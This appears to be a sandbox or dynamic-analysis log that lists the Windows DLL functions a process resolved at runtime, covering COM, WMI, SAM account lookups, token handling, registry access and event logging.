DynamicLoader: kernel32.dll/GetSystemInfo

                    
                
                    
                        
DynamicLoader: kernel32.dll/QueryPerformanceFrequency

                    
                
                    
                        
DynamicLoader: kernel32.dll/QueryPerformanceCounter

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetEvent

                    
                
                    
                        
DynamicLoader: ole32.dll/CoWaitForMultipleHandles

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountNameLocalW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/LookupAccountSidW

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountSidLocalW

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptGenRandom

                    
                
                    
                        
DynamicLoader: ole32.dll/NdrOleInitializeExtension

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetClassObject

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMarshalSizeMax

                    
                
                    
                        
DynamicLoader: ole32.dll/CoMarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUnmarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/StringFromIID

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetPSClsid

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: ole32.dll/CoReleaseMarshalData

                    
                
                    
                        
DynamicLoader: ole32.dll/DcomChannelSetHResult

                    
                
                    
                        
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetThreadUILanguage

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetThreadUILanguageW

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateDirectory

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateDirectoryW

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetFilePointer

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetLastError

                    
                
                    
                        
DynamicLoader: kernel32.dll/FindFirstFile

                    
                
                    
                        
DynamicLoader: kernel32.dll/FindFirstFileW

                    
                
                    
                        
DynamicLoader: kernel32.dll/FindClose

                    
                
                    
                        
DynamicLoader: kernel32.dll/FindNextFile

                    
                
                    
                        
DynamicLoader: kernel32.dll/FindNextFileW

                    
                
                    
                        
DynamicLoader: kernel32.dll/ReadFile

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetACP

                    
                
                    
                        
DynamicLoader: kernel32.dll/UnmapViewOfFile

                    
                
                    
                        
DynamicLoader: ole32.dll/CoInitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/StgOpenStorage

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUninitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/CoInitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/StgOpenStorage

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUninitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/CoInitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/StgOpenStorage

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUninitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/CoInitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/StgOpenStorage

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUninitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/IIDFromString

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetClassObject

                    
                
                    
                        
DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateFreeThreadedMarshaler

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetObjectContext

                    
                
                    
                        
DynamicLoader: kernel32.dll/LoadLibrary

                    
                
                    
                        
DynamicLoader: kernel32.dll/LoadLibraryA

                    
                
                    
                        
DynamicLoader: kernel32.dll/WideCharToMultiByte

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetProcAddress

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/ResetSecurity

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/SetSecurity

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/BlessIWbemServices

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/BlessIWbemServicesObject

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetPropertyHandle

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/WritePropertyValue

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/Clone

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/VerifyClientKey

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetQualifierSet

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/Get

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/Put

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/Delete

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetNames

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/BeginEnumeration

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/Next

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/EndEnumeration

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetPropertyQualifierSet

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/Clone

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetObjectText

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/SpawnDerivedClass

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/SpawnInstance

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/CompareTo

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetPropertyOrigin

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/InheritsFrom

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetMethod

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/PutMethod

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/DeleteMethod

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/BeginMethodEnumeration

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/NextMethod

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/EndMethodEnumeration

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetMethodQualifierSet

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetMethodOrigin

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/QualifierSet_Get

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/QualifierSet_Put

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/QualifierSet_Delete

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/QualifierSet_GetNames

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/QualifierSet_BeginEnumeration

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/QualifierSet_Next

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/QualifierSet_EndEnumeration

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetCurrentApartmentType

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetDemultiplexedStub

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/CreateInstanceEnumWmi

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/CreateClassEnumWmi

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/ExecQueryWmi

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/ExecNotificationQueryWmi

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/PutInstanceWmi

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/PutClassWmi

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/CloneEnumWbemClassObject

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/ConnectServerWmi

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/GetErrorInfo

                    
                
                    
                        
DynamicLoader: wminet_utils.dll/Initialize

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages

                    
                
                    
                        
DynamicLoader: kernel32.dll/LocaleNameToLCID

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetLocaleInfoEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/LCIDToLocaleName

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName

                    
                
                    
                        
DynamicLoader: fastprox.dll/DllGetClassObject

                    
                
                    
                        
DynamicLoader: fastprox.dll/DllCanUnloadNow

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/SysStringLen

                    
                
                    
                        
DynamicLoader: kernel32.dll/RtlZeroMemory

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMarshalSizeMax

                    
                
                    
                        
DynamicLoader: ole32.dll/CoMarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUnmarshalInterface

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegOpenKeyW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: USERENV.dll/CreateEnvironmentBlock

                    
                
                    
                        
DynamicLoader: sechost.dll/ConvertSidToStringSidW

                    
                
                    
                        
DynamicLoader: SspiCli.dll/GetUserNameExW

                    
                
                    
                        
DynamicLoader: USERENV.dll/DestroyEnvironmentBlock

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetClassObject

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMarshalSizeMax

                    
                
                    
                        
DynamicLoader: ole32.dll/CoMarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUnmarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/StringFromIID

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetPSClsid

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: ole32.dll/CoReleaseMarshalData

                    
                
                    
                        
DynamicLoader: ole32.dll/DcomChannelSetHResult

                    
                
                    
                        
DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI

                    
                
                    
                        
DynamicLoader: VSSAPI.DLL/CreateWriter

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/LookupAccountNameW

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountNameLocalW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/LookupAccountSidW

                    
                
                    
                        
DynamicLoader: samcli.dll/NetLocalGroupGetMembers

                    
                
                    
                        
DynamicLoader: SAMLIB.dll/SamConnect

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/NdrClientCall3

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcStringFreeW

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcBindingFree

                    
                
                    
                        
DynamicLoader: SAMLIB.dll/SamOpenDomain

                    
                
                    
                        
DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain

                    
                
                    
                        
DynamicLoader: SAMLIB.dll/SamOpenAlias

                    
                
                    
                        
DynamicLoader: SAMLIB.dll/SamFreeMemory

                    
                
                    
                        
DynamicLoader: SAMLIB.dll/SamCloseHandle

                    
                
                    
                        
DynamicLoader: SAMLIB.dll/SamGetMembersInAlias

                    
                
                    
                        
DynamicLoader: netutils.dll/NetApiBufferFree

                    
                
                    
                        
DynamicLoader: SAMLIB.dll/SamEnumerateDomainsInSamServer

                    
                
                    
                        
DynamicLoader: SAMLIB.dll/SamLookupDomainInSamServer

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateGuid

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: ole32.dll/StringFromCLSID

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: PROPSYS.dll/VariantToPropVariant

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemsvc.dll/DllGetClassObject

                    
                
                    
                        
DynamicLoader: wbemsvc.dll/DllCanUnloadNow

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzInitializeObjectAccessAuditEvent2

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzAccessCheck

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzFreeAuditEvent

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzFreeContext

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzInitializeResourceManager

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzFreeResourceManager

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/NdrClientCall3

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcBindingCreateW

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcBindingBind

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/I_RpcMapWin32Status

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcBindingFree

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventRegister

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventUnregister

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventWrite

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventActivityIdControl

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventWriteTransfer

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventEnabled

                    
                
                    
                        
DynamicLoader: kernel32.dll/RegCloseKey

                    
                
                    
                        
DynamicLoader: kernel32.dll/RegSetValueExW

                    
                
                    
                        
DynamicLoader: kernel32.dll/RegOpenKeyExW

                    
                
                    
                        
DynamicLoader: kernel32.dll/RegQueryValueExW

                    
                
                    
                        
DynamicLoader: kernel32.dll/RegCloseKey

                    
                
                    
                        
DynamicLoader: wmisvc.dll/IsImproperShutdownDetected

                    
                
                    
                        
DynamicLoader: Wevtapi.dll/EvtRender

                    
                
                    
                        
DynamicLoader: Wevtapi.dll/EvtNext

                    
                
                    
                        
DynamicLoader: Wevtapi.dll/EvtClose

                    
                
                    
                        
DynamicLoader: Wevtapi.dll/EvtQuery

                    
                
                    
                        
DynamicLoader: Wevtapi.dll/EvtCreateRenderContext

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcBindingSetOption

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcStringFreeW

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/NdrClientCall3

                    
                
                    
                        
DynamicLoader: RPCRT4.dll/RpcBindingFree

                    
                
                    
                        
DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateFreeThreadedMarshaler

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMarshalSizeMax

                    
                
                    
                        
DynamicLoader: ole32.dll/CreateStreamOnHGlobal

                    
                
                    
                        
DynamicLoader: ole32.dll/CoMarshalInterface

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptGenRandom

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptReleaseContext

                    
                
                    
                        
DynamicLoader: KERNELBASE.dll/InitializeAcl

                    
                
                    
                        
DynamicLoader: KERNELBASE.dll/AddAce

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountSidLocalW

                    
                
                    
                        
DynamicLoader: kernel32.dll/OpenProcessToken

                    
                
                    
                        
DynamicLoader: KERNELBASE.dll/GetTokenInformation

                    
                
                    
                        
DynamicLoader: KERNELBASE.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: KERNELBASE.dll/AdjustTokenPrivileges

                    
                
                    
                        
DynamicLoader: KERNELBASE.dll/AllocateAndInitializeSid

                    
                
                    
                        
DynamicLoader: KERNELBASE.dll/CheckTokenMembership

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegOpenKeyW

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetThreadToken

                    
                
                    
                        
DynamicLoader: ole32.dll/CLSIDFromString

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: ole32.dll/CoRevertToSelf

                    
                
                    
                        
DynamicLoader: SspiCli.dll/LogonUserExExW

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetClassObject

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzInitializeResourceManager

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzInitializeContextFromSid

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzAccessCheck

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzFreeContext

                    
                
                    
                        
DynamicLoader: authZ.dll/AuthzFreeResourceManager

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountSidLocalW

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetCallContext

                    
                
                    
                        
DynamicLoader: ole32.dll/StringFromGUID2

                    
                
                    
                        
DynamicLoader: ole32.dll/CoImpersonateClient

                    
                
                    
                        
DynamicLoader: ole32.dll/CoSwitchCallContext

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateGuid

                    
                
                    
                        
DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI

                    
                
                    
                        
DynamicLoader: ole32.dll/CoInitializeEx

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/CoInitializeEx

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUninitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: wbemcore.dll/Reinitialize

                    
                
                    
                        
DynamicLoader: CRYPTBASE.dll/SystemFunction036

                    
                
                    
                        
DynamicLoader: ole32.dll/CLSIDFromOle1Class

                    
                
                    
                        
DynamicLoader: CLBCatQ.DLL/GetCatalogObject

                    
                
                    
                        
DynamicLoader: CLBCatQ.DLL/GetCatalogObject2

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountNameLocalW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/LookupAccountSidW

                    
                
                    
                        
DynamicLoader: sechost.dll/LookupAccountSidLocalW

                    
                
                    
                        
DynamicLoader: uxtheme.dll/ThemeInitApiHook

                    
                
                    
                        
DynamicLoader: USER32.dll/IsProcessDPIAware

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetClassObject

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMarshalSizeMax

                    
                
                    
                        
DynamicLoader: ole32.dll/CoMarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUnmarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/StringFromIID

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetPSClsid

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: ole32.dll/CoReleaseMarshalData

                    
                
                    
                        
DynamicLoader: ole32.dll/DcomChannelSetHResult

                    
                
                    
                        
DynamicLoader: wininet.dll/DllGetClassObject

                    
                
                    
                        
DynamicLoader: wininet.dll/DllCanUnloadNow

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMarshalSizeMax

                    
                
                    
                        
DynamicLoader: ole32.dll/CoMarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUnmarshalInterface

                    
                
                    
                        
DynamicLoader: ole32.dll/CoReleaseMarshalData

                    
                
                    
                        
DynamicLoader: wininet.dll/DllGetClassObject

                    
                
                    
                        
DynamicLoader: wininet.dll/DllCanUnloadNow

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoImpersonateClient

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoRevertToSelf

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EqualSid

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventUnregister

                    
                
                    
                        
DynamicLoader: Secur32.dll/GetUserNameExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey

                    
                
                    
                        
